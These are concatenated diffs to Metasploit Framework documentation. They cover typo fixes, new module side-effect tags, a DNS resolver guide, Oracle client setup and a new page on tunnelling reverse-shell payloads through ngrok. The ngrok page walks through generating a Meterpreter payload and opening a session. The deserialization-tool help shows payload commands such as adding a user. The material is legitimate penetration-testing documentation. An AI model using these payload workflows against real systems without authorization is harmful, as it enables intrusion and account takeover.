-   2.2.22
+   2.5.10
@@ -32,7 +32,7 @@ exclude:
 # just-the-docs config
 mermaid_enabled: true
 mermaid:
-  version: "9.2.2"
+  version: "10.8.0"
 heading_anchors: true
 aux_links_new_tab: true
 aux_links:
@@ -146,7 +146,7 @@ register_options(
  ], self.class)
 ```

-**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
+**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**

 ```ruby
 data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
 ```ruby
 # https://github.com/rapid7/metasploit-framework/issues/3853
 datastore['BAD'] = 'This is bad.'
-```
+```
@@ -342,7 +342,7 @@ The result object now as a `.to_h` method which returns a hash compatible with o

 In the case of a success we build some info hashes and call `create_credential`. This is a method found in the metasploit-credential gem under `lib/metasploit/credential/creation.rb` in a mixin called `Metasploit::Credential::Creation`. This mixin is included in the Report mixin, so if your module includes that mixin you'll get these methods for free.

-`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the the status. 
+`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the status. 

 Finally, for a success, we output the result to the console.

@@ -59,6 +59,7 @@ Example:
 | CONFIG_CHANGES | Module modifies some config file |
 | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
 | ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
+| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
 | SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
 | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
 | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |
@@ -70,3 +71,4 @@ Example:
 | FIRST_ATTEMPT_FAIL | The module may fail for the first attempt |
 | REPEATABLE_SESSION | The module is expected to get a session every time it runs |
 | UNRELIABLE_SESSION | The module isn't expected to get a shell reliably (such as only once) |
+| EVENT_DEPENDENT    | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc |
@@ -82,24 +82,41 @@ Generate a .NET deserialization payload that will execute an operating system
 command using the specified gadget chain and formatter.

 Available formatters:
-   * BinaryFormatter
-   * LosFormatter
-   * SoapFormatter
+  * BinaryFormatter
+  * LosFormatter
+  * SoapFormatter

 Available gadget chains:
-   * TextFormattingRunProperties
-   * TypeConfuseDelegate
-   * WindowsIdentity
+  * ClaimsPrincipal
+  * DataSet
+  * DataSetTypeSpoof
+  * ObjectDataProvider
+  * TextFormattingRunProperties
+  * TypeConfuseDelegate
+  * WindowsIdentity

-Example: ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties
+Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5

-Specific options:
-   -c, --command   <String>         The command to run
-   -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
-   -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
-   -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
-       --list-output-formats        List available output formats, for use with --output
-   -h, --help                       Show this message
+Examples:
+  ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
+  ./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
+    --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
+
+General options:
+    -h, --help                       Show this message
+    -c, --command   <String>         The command to run
+    -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
+    -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
+    -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
+        --list-output-formats        List available output formats, for use with --output
+
+ViewState related options:
+        --viewstate-generator             <String>
+                                     The ViewState generator string to use
+        --viewstate-validation-algorithm  <String>
+                                     The validation algorithm (default: SHA1, see: Available HMAC algorithms)
+        --viewstate-validation-key        <HexString>
+                                     The validationKey from the web.config file
 ```

 The `-g` / `--gadget` option maps to the *gadget_chain* argument for the
@@ -112,6 +112,11 @@ end
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

+### Non-required fields
+
+* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
+
+* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -18,7 +18,7 @@ plugin_name_command --option

 The current available plugins for Metasploit can be found by running the `load -l` command, or viewing Metasploit's [plugins](https://github.com/rapid7/metasploit-framework/tree/master/plugins) directory:

-| name             | Description                                                                                         |
+| Name             | Description                                                                                         |
 |------------------|-----------------------------------------------------------------------------------------------------|
 | aggregator       | Interacts with the external Session Aggregator                                                      |
 | alias            | Adds the ability to alias console commands                                                          |
@@ -30,6 +30,7 @@ The current available plugins for Metasploit can be found by running the `load -
 | db_tracker       | Monitors socket calls and updates the database backend                                              |
 | event_tester     | Internal test tool used to verify the internal framework event subscriber logic works               |
 | ffautoregen      | This plugin reloads and re-executes a file-format exploit module once it has changed                |
+| fzuse            | A plugin offering a fuzzy use command                                                               |
 | ips_filter       | Scans all outgoing data to see if it matches a known IPS signature                                  |
 | lab              | Adds the ability to manage VMs                                                                      |
 | libnotify        | Send desktop notification with libnotify on sessions and db events                                  |
@@ -42,12 +43,12 @@ The current available plugins for Metasploit can be found by running the `load -
 | request          | Make requests from within Metasploit using various protocols.                                       |
 | rssfeed          | Create an RSS feed of events                                                                        |
 | sample           | Demonstrates using framework plugins                                                                |
-| session_notifier | This plugin notifies you of a new session via SMS                                                      |
+| session_notifier | This plugin notifies you of a new session via SMS                                                   |
 | session_tagger   | Automatically interacts with new sessions to create a new remote TaggedByUser file                  |
 | socket_logger    | Log socket operations to a directory as individual files                                            |
 | sounds           | Automatically plays a sound when various framework events occur                                     |
 | sqlmap           | sqlmap plugin for Metasploit                                                                        |
-| thread           | Internal test tool for testing thread usage in Metasploit                                          |
+| thread           | Internal test tool for testing thread usage in Metasploit                                           |
 | token_adduser    | Attempt to add an account using all connected Meterpreter session tokens                            |
 | token_hunter     | Search all active Meterpreter sessions for specific tokens                                          |
 | wiki             | Outputs stored database values from the current workspace into DokuWiki or MediaWiki format         |
@@ -0,0 +1,165 @@
+# Metasploit DNS
+## Background
+Most applications that need to handle hostname to IP address lookups rely on the host operating system, either by
+passing the hostname directly to the socket-creation function or by calling a purpose built API such as `getaddrinfo`.
+This was also how Metasploit handled name lookups and would only directly communicate with a DNS server when the request
+was more involved than mapping a hostname to an IPv4 or IPv6 address.
+
+One flaw in this approach is that when pivoting connections over a session, the DNS lookups would occur through the host
+on which Metasploit was running instead of the compromised host from which the connection would originate. This lead to
+two issues, the first being the aforementioned DNS leaks and the second that Metasploit could not always resolve
+hostnames that the compromised system could.
+
+Starting in Metasploit 6.4, Metasploit uses an internal DNS resolution system that grants the user a high degree of
+control over the process of DNS queries.
+
+## The DNS command
+Metasploit's DNS configuration is controlled by the `dns` command which has multiple subcommands.
+
+The current configuration can be printed by running `dns print`:
+
+```msf
+msf6 > dns print
+Default search domain: N/A
+Default search list:   lab.lan
+Current cache size:    0
+
+Resolver rule entries
+=====================
+
+   #  Rule    Resolver    Comm channel
+   -  ----    --------    ------------
+   1  *                   
+   .    \_    static      N/A
+   .    \_    127.0.0.53  
+
+
+Static hostnames
+================
+
+   Hostname                 IPv4 Address   IPv6 Address
+   --------                 ------------   ------------
+   localhost                127.0.0.1      ::1
+     \_                     127.1.1.1      
+   localhost.localdomain    127.0.0.1      ::1
+   localhost4               127.0.0.1      
+   localhost4.localdomain4  127.0.0.1      
+   localhost6                              ::1
+   localhost6.localdomain6                 ::1
+```
+
+The `help` subcommand can be used to display the available subcommands. The name of a subcommand can also be specified 
+as an argument to `help` to display additional information about that subcommand, for example `dns help add`.
+
+Metasploit's DNS system is composed of the following major components: resolver rules, static entries and the cache.
+
+## DNS Resolver Rules
+DNS resolver rules are a single wildcard that is associated with zero or more resolver types. When a query name matches
+the wildcard expression, the associated resolvers are used in succession until one is capable of fulfilling the request.
+For example, a wildcard pattern of `*.lab.lan` would match `www.lab.lan` and `_ldap._tcp.lab.lan`, but not `lab.lan` or
+`msflab.lan`. Furthermore, the `*` wildcard pattern matches everything and should be used as a default rule.
+
+Once a rule that matches the query name is found, the specified resolvers will be tried in order until one is capable of
+handling the request. Different resolver types can be specified to handle queries in different ways. Rules are listed
+in numeric order starting at position 1. Rules can be added to or removed from specific positions in a similar manner to
+how iptables rules can be added to and removed from a specific chain.
+
+### The Black Hole Resolver
+The black hole resolver can be used to prevent queries from being resolved. It handles all query types and will prevent
+resolvers defined after it from being used. The black hole resolver is specified by using the `black-hole` keyword.
+
+### The Upstream Resolver
+An upstream resolver can be used by specifying either an IPv4 or IPv6 address. When Metasploit uses this resolver, the
+defined host will be contacted over the network. A session can optionally be defined through which network traffic will
+be sent.
+
+### The System Resolver
+The system resolver can be used for hostname resolution to either IPv4 or IPv6 addresses by invoking the host operating
+system's API. This is particularly useful in cases where the system's API is expected to be hooked by an external entity
+such as proxychains. The system resolver is specified by using the `system` keyword. Queries that can not be fulfilled
+by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is
+configured in the rule.
+
+### The Static Resolver
+The static resolver can be used for hostname resolution to either IPv4 or IPv6 addresses through a static mapping that
+is configured within Metasploit. This functionality is analogous to the `hosts` file found on many systems which defines
+static hostname to IP address associations. The static resolver is specified by using the `static` keyword. Queries that
+can not be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the
+next resolver that is configured in the rule.
+
+See [Static DNS Entries](#static-dns-entries) for configuring static entries.
+
+### Example Rules
+
+Define a single rule in the first position to handle all queries through three resolvers, first checking if there is a
+static entry in Metasploit then using the system resolver and finally specifying an upstream DNS server to handle any
+other query type.
+
+```
+dns add --index 1 --rule * static system 192.0.2.1
+```
+
+Append a rule to the end that will handle all queries for `*.lab.lan` using an upstream server contacted through session
+1.
+
+```
+dns add --rule *.lab.lan --session 1 192.0.2.1
+```
+
+Append a rule to drop all queries for `*.noresolve.lan` using the black hole resolver.
+
+```
+dns add --rule *.noresolve.lan black-hole
+```
+
+## Static DNS Entries
+Static entries used by the static resolver are configured through the `add-static` and `remove-static` subcommands. The
+currently configured entries can be viewed in the `dns print` output and all entries can be flushed with the
+`flush-static` subcommand. Static entries that are configured are shared across *all* rules in which a static resolver
+is specified. In order for the static entry to be used, at least one rule must match the hostname, and that rule must be
+configured to use the static resolver. A single hostname can be associated with multiple IP addresses and the same IP
+address can be associated with multiple hostnames.
+
+### Example Static Entries
+
+Define static entries for `localhost` and common variations.
+
+```
+dns add-static localhost  127.0.0.1 ::1
+dns add-static localhost4 127.0.0.1
+dns add-static localhost6 ::1
+```
+
+Remove all static entries for `localhost`.
+
+```
+dns remove-static localhost
+```
+
+Remove all static entries.
+
+```
+dns flush-static
+```
+
+## The DNS Cache
+DNS query replies are cached internally by Metasploit based on their TTL. This intends to minimize the amount of network
+traffic required to perform the necessary lookups. The number of query replies that are currently cached is available in
+the `dns print` output and all replies can be flushed with the `flush-cache` subcommand.
+
+## Configuration Management
+The DNS configuration can be saved using the `save` command from the `msfconsole` command context. Once saved, the
+settings will be automatically restored the next time Metasploit starts up. Any changes that are made at runtime will be
+lost when Metasploit exits, unless the `save` command is used.
+
+### Resetting the Configuration
+The DNS configuration can be restored to the default state by using the `reset-config` subcommand. The default
+configuration:
+
+* Populates the static entries from the host operating system's `hosts` file
+* Defines a single rule that matches all query names whose first resolver is the `static` resolver and the remaining
+  resolvers are set from the host operating systems' resolv.conf file
+
+## Resolving hostnames
+The `resolve` subcommand can be used to resolve a hostname to either an IPv4 or IPv6 address. In doing so, the rule that
+was used to define the resolvers will be printed allowing the wildcard matching logic to be tested.
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.

 ## Install the Oracle Instant Client
-As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:

-* instantclient-basic-linux-12.2.0.1.0.zip
-* instantclient-sqlplus-linux-12.2.0.1.0.zip
-* instantclient-sdk-linux-12.2.0.1.0.zip
+* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)

-Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
-
-```
-root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
-
-root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
-lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
-```
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.

 You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.

 ```
-export PATH=$PATH:/opt/oracle/instantclient_12_2
-export SQLPATH=/opt/oracle/instantclient_12_2
-export TNS_ADMIN=/opt/oracle/instantclient_12_2
-export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
-export ORACLE_HOME=/opt/oracle/instantclient_12_2
+export PATH=$PATH:/opt/oracle/instantclient_23_6
+export SQLPATH=/opt/oracle/instantclient_23_6
+export TNS_ADMIN=/opt/oracle/instantclient_23_6
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
+export ORACLE_HOME=/opt/oracle/instantclient_23_6
 ```

 If you have succeeded, you should be able to run `sqlplus` from a command prompt:
 ```
-root@kali:/opt/oracle/instantclient_12_2# sqlplus
+root@kali:/opt/oracle/instantclient_23_6# sqlplus

 SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019

@@ -64,40 +57,40 @@ Enter user-name:
 First, download and extract the gem source release:

 ```
-root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
+root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
+--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
 Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
 Connecting to github.com (github.com)|192.30.253.113|:443... connected.
 HTTP request sent, awaiting response... 302 Found
-Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
+Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
+--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [application/zip]
-Saving to: 'ruby-oci8-2.2.7.zip'
+Saving to: 'ruby-oci8-2.2.14.zip'

-ruby-oci8-2.2.7.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    
+ruby-oci8-2.2.14.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    

-2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
+2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]

-root@kali:~# unzip ruby-oci8-2.2.7.zip 
-Archive:  ruby-oci8-2.2.7.zip
+root@kali:~# unzip ruby-oci8-2.2.14.zip 
+Archive:  ruby-oci8-2.2.14.zip
 0c85bf6da2f541de3236267b1a1b18f0136a8f5a
-   creating: ruby-oci8-ruby-oci8-2.2.7/
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore  
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml 
+   creating: ruby-oci8-ruby-oci8-2.2.14/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore  
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml 
 [...]
-  inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
-root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
+root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
 ```

 Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
 Reading package lists... Done
 Building dependency tree
 Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
 Build and install the gem

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
 ruby -w setup.rb config
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
 <--- lib
 ---> ext
 ---> ext/oci8
-/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
+/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
 checking for load library path...
  LD_LIBRARY_PATH...
    checking /opt/metasploit/ruby/lib... no
-    checking /opt/oracle/instantclient_12_2... yes
-  /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
+    checking /opt/oracle/instantclient_23_6... yes
+  /opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
 checking for cc... ok
 checking for gcc... yes
 checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
 checking for OCIInitialize() in oci.h... yes
 [...]
 linking shared-object oci8lib_250.so
-make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
+make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
 <--- ext/oci8
 <--- ext

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
 ruby -w setup.rb install
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
 ```
@@ -0,0 +1,128 @@
+# Overview
+[ngrok][1] is a popular service that offers free port-forwarding that is easy to setup without needing to run a
+dedicated server on a public IP address (as is the case with SSH, socat and other more traditional options. This means
+that users behind a SNATing device such as a SOHO router can accept reverse shells and other connections without needing
+to configure port forwarding.
+
+**WARNING:** The nature of using ngrok is to send traffic through a third party. ngrok and the server which it utilizes
+are not affiliated with the Metasploit project. Use of ngrok effectively sends traffic through an untrusted third party
+and should be done with extreme caution. While Meterpreter has offered end-to-end encryption since Metasploit 6.0, other
+payloads and connections do not.
+
+ngrok can start multiple types of tunnels. The `tcp` tunnel is compatible with Metasploit's payloads and most closely
+resembles a traditional port-forwarding configuration. The `http` tunnel type is not compatible with payloads, and
+should not be used. The `tls` tunnel type may be compatible, but access to it is restricted to the Enterprise and 
+Pay-as-you-go paid plans. This document will focus on the use cases for the `tcp` tunnel type. Note that one limitation
+is that the public port can not be configured, it is randomly selected by ngrok meaning that the target will need to be
+able to connect to this high, obscure port which may be prevented by egress filtering.
+
+## Usage with payloads
+Use with payloads can be achieved with any of the reverse-connection stagers that accept `LHOST` and `LPORT` options,
+e.g. reverse_tcp, reverse_http, reverse_https, etc. but not reverse_named_pipe. In the following scenario, ngrok will be
+used to forward a random public port to the Metasploit listener on port 4444. This scenario assumes that Metasploit and
+ngrok are running on the same host.
+
+**NOTE:** At this time, payloads handle DNS hostnames inconsistently. Some are compatible with hostnames while others
+require IP addresses to be specified as the target to connect to (the `LHOST` option). To ensure the specified payload
+will work, the hostname provided by ngrok should be resolved to an IP address and the IP address should be used as the
+value for `LHOST`.
+
+1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
+1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and
+   port number from this line, e.g. `4.tcp.ngrok.io:13779`
+1. Resolve the hostname from the previous step to an IP address.
+1. Start msfconsole and use the desired payload or exploit module.
+  * Using `msfconsole` for both generating the payload and handling the connection is recommended over using `msfvenom`
+    for two reasons.
+    1. Using `msfvenom` starts up an instance of the framework to generate the payload, making it a slower process.
+    2. Using `msfconsole` to configure both the payload and handler simultaneously ensures that the options are set for
+       both, eliminating the possibility that they are out of sync.
+1. Set the `LHOST` option to the IP address noted in step 3. This is where the payload is expecting to connect to.
+1. Set the `LPORT` option to the port noted in step 2, `13779` in the example.
+1. Set the `ReverseListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
+   from ngrok.
+1. Set the `ReverseListenerBindPort` option to `4444`.
+1. Either run the exploit, or generate the payload with the `generate` command and start the handler with `to_handler`
+
+Once the payload has been executed, either through the exploit or manual means, there should be a open connection seen
+through the ngrok terminal.
+
+### Payload Demo
+
+ngrok side:
+```
+$ ngrok tcp localhost:4444
+ngrok                                                           (Ctrl+C to quit)
+
+Take our ngrok in production survey! https://forms.gle/aXiBFWzEA36DudFn6
+
+Session Status                online
+Account                       ????? (Plan: Personal)
+Version                       3.16.0
+Region                        United States (us)
+Latency                       33ms
+Web Interface                 http://127.0.0.1:4040
+Forwarding                    tcp://4.tcp.ngrok.io:17511 -> localhost:4444
+
+Connections                   ttl     opn     rt1     rt5     p50     p90
+                              0       0       0.00    0.00    0.00    0.00
+```
+
+resolve the hostname `4.tcp.ngrok.io` to an IP address
+```
+$ dig +short 4.tcp.ngrok.io
+192.0.2.1
+```
+
+metasploit side:
+```msf
+msf6 > use payload/windows/x64/meterpreter/reverse_http
+msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
+LHOST => 192.0.2.1
+msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
+LPORT => 17511
+msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
+ReverseListenerBindAddress => 127.0.0.1
+msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
+ReverseListenerBindPort => 4444
+msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler 
+[*] Payload Handler Started as Job 2
+msf6 payload(windows/x64/meterpreter/reverse_http) > 
+[*] Started HTTP reverse handler on http://127.0.0.1:4444
+
+msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
+[*] Writing 7168 bytes to ngrok_payload.exe...
+msf6 payload(windows/x64/meterpreter/reverse_http) > 
+[*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400
+
+msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: MSFLAB\smcintyre
+meterpreter >
+```
+
+## Usage with server modules
+Some modules expect connections to be made to them by the target. These modules can also be used with ngrok, with some
+slight variations to the payload workflow in regards to their datastore options. Modules that start servers can be
+identified by using the `SRVHOST` and `SRVPORT` datastore options.
+
+**NOTE:** Free ngrok plans can only open one tcp tunnel at a time. This means that if the module is an exploit that a
+tcp tunnel for a reverse-connection payload will not be able to be opened at the same time. Use a second ngrok account
+to open a second tcp tunnel and follow the steps above for the payload configuration.
+
+1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
+1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and
+   port number from this line, e.g. `4.tcp.ngrok.io:13779`
+1. Resolve the hostname from the previous step to an IP address.
+1. Start msfconsole and use the desired module.
+1. Set the `LHOST` option to the IP address noted in step 3. This is where the payload is expecting to connect to.
+1. Set the `SRVPORT` option to the port noted in step 2, `13779` in the example.
+1. Set the `ListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
+   from ngrok.
+1. Set the `ListenerBindPort` option to `4444`.
+1. Run the module
+
+[1]: https://ngrok.com/
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -1,4 +1,8 @@
-By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
+Metasploit offers inbuilt test modules which can be used for verifying Metasploit's post-exploitations work with currently opened sessions.
+These modules are intended to be used by developers to test updates to ensure they don't break core functionality
+and should not be used during normal operations. These modules also as part of the automated test suite within pull requests.
+
